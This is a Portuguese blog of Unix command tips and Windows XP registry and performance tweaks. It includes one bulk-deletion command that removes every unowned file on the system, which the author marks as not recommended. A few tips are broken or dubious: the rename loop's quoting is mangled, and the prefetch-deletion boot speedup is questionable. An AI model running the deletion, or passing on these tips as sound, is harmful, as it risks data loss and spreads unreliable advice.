Além destes livros, que até à pouco tempo atrás somente podiam ser encontrados em livrarias, existem também os livros gratuitos existentes na Internet e que somente são encontrados na sua versão online.


Os livros estão agrupados por título e sempre existem novidades. Não se esqueça de visitar esta página. É uma mina de ouro! :)

O Comando find

O comando find é extremamente poderoso e flexível para descobrir ficheiros que correspondam a determinadas especificações.


Por exemplo, suponhamos que queiramos descobrir todos os ficheiros que não possuem dono no nosso sistema. Esta situação é extremamente comum, visto que utilizadores são criados e apagados diariamente e ficam vagando pelo sistema e podem eventualmente vir a comprometer a segurança. O comando



find / -nouser -print

irá criar uma listagem com todos os ficheros do sistema que não pertencem a ninguém.


Caso queiramos simplesmente apagar estes ficheiros (não recomendável!!!) basta redirecionar a saída deste comando para o comando xargs, da seguinte forma:



find / -nouser -print | xargs rm

O mais recomendável é criar um backup destes ficheiros, para de seguida apagá-los:



find . -cpio /dev/rmt0 -nouser

Para restaurar estes ficheiros



cpio -idmv < /dev/rmt0

O comando cpio, a exemplo do comando find, é extremamente poderoso e flexível. Para mais informações sobre a sua utilização e sintaxe, consulte as man pages (ou as próximas dicas :)

O programa gzip

O programa gzip é hoje extremamente popular na Internet. A maioria dos servidores de ftp anónimos da Internet compactam os seus ficheiros com este programa.


Programas compactados com o programa gzip apresentam a extensão .gz. como em sendmail.tar.gz.


Para descompactar ficheiros como este, visando a instalação do produto, no nosso caso, sendmail, é comum seguir os seguintes passos



gunzip sendmail.tar.gz
tar xvf sendmail.tar





Na verdade não é necessária a realização do primeiro passo. O ficheiro pode ser descompactado para stdout e redireccionado para o programa tar. Desta forma ocupa-se menos disco. O comando







gzip -dc sendmail.tar.gz | tar xvf -





obtem exactamente os mesmos resultados dos comandos anteriores sem descompactar o ficheiro de distribuição original

O comando dd

O comando dd possui várias outras funções interessantes além da cópia pura e simples de ficheiros. Um função que julgo bastante útil é a conversão de caracteres.


Por exemplo, para se converter todos as letras maiúsculas de um documento para letras minúsculas, executar o comando abaixo:



dd if=ficheiro1 of=ficheiro2 conv=lcase

Este comando irá converter todos as letras maiúsculas do ficheiro1 em letras minúsculas e gerar outro ficheiro chamado ficheiro2 com o resultado do processamento.


Da mesma forma, se quisermos converter todas as letras do ficheiro2 para maiúsculas:



dd if=ficheiro2 of=ficheiro3 conv=ucase

Outra aplicação interessante deste comando seria renomear todos os ficheiros de um determinado directório com seu nome equivalente em letras minúsculas:



#!/bin/sh
for file in ""ls""
do
mv $file ""echo $file | dd conv=lcase""
done

Man Pages

Às vezes se deseja imprimir algumas páginas do manual do sistema. Normalmente executa-se o comando man redireccionando a saída para um ficheiro:



man ls > ls.doc

Alguns sistemas operativos entretanto costumam sublinhar determinadas partes do documento e às vezes a impressora não suporta este tipo de impressão.


Para retirar os sublinhados, basta redireccionar a saída do comando man através do comando col invocado com a opção -b:



man ls | col -b > ls.doc

O documento criado, no nosso caso, ls.doc, pode então ser impresso em qualquer tipo de impressora.

Pipes

Um dos factores que marcam a superioridade do Unix é o conceito de pipes. No Unix a filosofia original previa o desenvolvimento de módulos que desempenhassem uma tarefa e a desempenhassem bem.

Vejam só este exemplo:

cat book*|deroff -w|dd conv=lcase|sort|uniq -c|sort -nr|more

Esta sequência de comandos irá realizar uma tarefa que iria requerer muitas linhas de código e muito planeamento. Vamos analisá-la:

cat book* - redirecciona para a saída padrão o conteúdo de ficheiros iniciados em book
deroff -w - transforma o resultado do comando cat numa saída contendo uma palavra por linha
dd conv=lcase - converte para letras minúsculas o resultado do comando deroff
sort - ordena alfabeticamente o resultado
uniq -c - agrupa palavras iguais registando o número de ocorrências
sort -nr - realiza uma nova ordenação, porém numérica, colocando no topo da lista as palavras que ocorrem com mais freqüência
more - exibe um ecrã de cada vez

Este exemplo ilustra de maneira clara como diversos comandos reunidos podem realizar tarefas complexas e num tempo ínfimo, comparado com o esforço necessário para escrever um programa que desempenhe tarefa similar. Cada um dos comandos acima realiza um processamento sobre os dados que lhe são fornecidos, preparando-os para serem processados pelo próximo comando na sequência.

Agora, para que serve isto? Por exemplo, um professor de literatura analisando a obra de Shakespeare, poderia querer determinar um padrão no uso de palavras. Outro exemplo, um professor de inglês instrumental poderia querer determinar as palavras mais utilizadas para elaborar as suas aulas de maneira mais eficiente. Poderia até mesmo determinar padrões de uso diferentes para cada área de especialização, como medicina, engenharia, administração, etc, etc. Ainda outro exemplo, um administrador de sistemas pode desejar analisar ficheiros de log criados pelo tcpwrapper, syslog, e outros para identificar padrões de invasão dos seus sistemas. As possibilidades são infinitas (e interessantes :-)

02 maio, 2009

Manter sempre a mesma página Inicial no browser

Alguns sites de forma ilegal modificam o teu editor de registo e colocam o seu site como página inicial pré-definida, para acabar com esta situação segue os seguintes passos:

  1. Clique direito no ícone do Internet Explorer ou Firefox selecciona propriedades.
  2. Na caixa de texto “Destino” tu poderas ler “C:\Programas\Internet Explorer\IEXPLORE.EXE” ou “C:\Programas\Mozilla\Firefox.exe”.
  3. Agora ao adicionares o endereço do site que desejas como página inicial ao final deste campo vais substituir a definição da homepage nas opções do Internet Explorer ou do Firefox
  4. Exemplo:

Boa navegação na Internet contra homepagejacking =)

Aumentar a velocidade com que os menus aparecem

Para aumentar a velocidade com que aparecem os menus no Windows XP segue os seguintes passos:

  1. Menu Iniciar
  2. Executar
  3. Digita regedit.exe
  4. Navega até HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP
  5. Localiza a chave chamada de MenuShowDelay, provavelmente o seu valor está pré-definido para 400. Modifica esse valor para 150
  6. Reinicia o teu computador

E voilá! Vais notar um ligeiro aumento da velocidade dos menus =)

Como fazer o Windows Explorer abrir a pasta que desejas

Está farto do "Explorador do Windows" iniciar sempre a partir dos meus documentos?


Podes personalizar isto através da modificação das propriedades do ícone do "Explorador do Windows" e substituir o ficheiro alvo com:



%systemroot%\explorer.exe /n, /e, c:\caminho_absoluto_para_a_pasta_que_desejas

Modificar a pasta pré-definida para a instalação dos programas

Enquanto o tamanho dos discos rígidos aumenta, cada vez mais pessoas usam as partições para separar e guardar grupos de ficheiros.


O Windows XP usa a pasta c:\Programas como o directório base onde os novos programas são instalados. Apesar disso, é possível modificar a drive pré-definida ou directório através da utilização de um hack de Registo.


Executa os seguintes passos:



  1. Iniciar

  2. Executar

  3. Digita "regedit" (sem as aspas)

  4. Vai para este directório... HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

  5. Procura o pelo valor com o nome ProgramFilesDir. Por pré-definição este valor será C:\Programas. Edita o valor para qualquer drive ou pasta válida e o Windows XP irá começar a usar essa pasta como directório de instalação pré-definido para os novos programas.


Boas instalações =)

26 abril, 2009

Iniciar o Windows XP de uma forma mais rápida

Para poder melhorar a velocidade de arranque do seu Windows XP deve efectuar os seguintes passos:



  1. Abrir o notepad.exe, digitar "del c:\windows\prefetch\ntosboot-*.* /q" (sem as aspas) e guardar como "ntosboot.bat" em c:\
  2. A partir do menu Iniciar, seleccionar "Executar…" e digitar "gpedit.msc".
  3. Duplo clique em "Definições de Janelas" na secção "Configuração do Computador" e duplo clique novamente em "Desligar" na janela direita.
  4. Na nova janela, clique em "adicionar", "procurar", localize o seu ficheiro "ntosboot.bat" e clique em "Abrir".
  5. Clique "Ok", "Aplicar" e "Ok" de novo para sair.
  6. A partir do menu Iniciar, seleccionar "Executar…" e digite "devmgmt.msc".
  7. Duplo clique em "Controladores IDE ATA/ATAPI"
  8. Clique com o botão direito do rato no "Canal IDE Primário" e seleccione "Propriedades".
  9. Seleccione as "Definições Avançadas" agora no dispositivo ou no 1º que não tenha "tipo de dispositivo" a cinzento seleccione "nenhum" em vez de "auto-detectar" e clique em "Ok"
  10. Clique direito no "Canal IDE Secundário", seleccione "Propriedades" e repita os passos do 9.
  11. Reinicie o seu computador

É só bom arranque mais rápido do seu computador =)

Como desactivar o Envio de Relatórios de Erro para a Microsoft

Para desactivar a estúpida função no Windows XP que tenta enviar um relatório de erro cada vez que um programa vai bloqueia têm de fazer o seguinte:


**********************************************************************************


Abrir o Painel de Controlo


Clicar em Performance e Manutenção


Clicar em Sistema


Agora clicar na Opção Avançadas


Clicar no botão de Relatório de Erro na parte debaixo da janela


Seleccionar Desactivar relatório de erros


Clicar Ok


Clicar Ok


E é só!


Boa utilização do seu computador sem o incomodativo relatório de erros =)

Criar um ficheiro gigantesco de uma maneira simples

Você pode criar um ficheiro de qualquer tamanho usando nada mais do que o que é fornecido com o Windows. Comece por converter o tamanho do ficheiro desejado em notação hexadecimal. Você pode usar a calculadora do Windows no modo Científico para fazer isso. Suponha que você queira um ficheiro de 1 milhão de bytes. Digite 1000000 na calculadora e clique sobre a opção de converter Hex (1 milhão em hexadecimal é F4240). Preencha o resultado com zeros à esquerda até o tamanho do ficheiro atingir oito dígitos - 000F4240.


Agora, abra uma janela da linha de comandos. No Windows 95, 98 ou Me, você pode fazer isso, digitando "command" no menu Iniciar do diálogo Executar, no Windows NT 4.0, 2000 ou XP digite "CMD". Digite o comando DEBUG BIGFILE.DAT e ignore a mensagem Ficheiro não encontrado. Tipo RCX e pressione Enter. Debug exibirá um prompt cólon. Digite os quatro últimos dígitos do número hexadecimal calculado (4240, no nosso exemplo). Tipo RBX e pressione Enter, em seguida, digite os quatro primeiros algarismos dos hexadecimais tamanho (000F, no nosso exemplo). Digite Q e W para Escrever e para Sair. Você acabou de criar um ficheiro com 1 mil~hão de bytes usando o Debug. Claro que você pode criar um ficheiro de qualquer tamanho desejado utilizando a mesma técnica.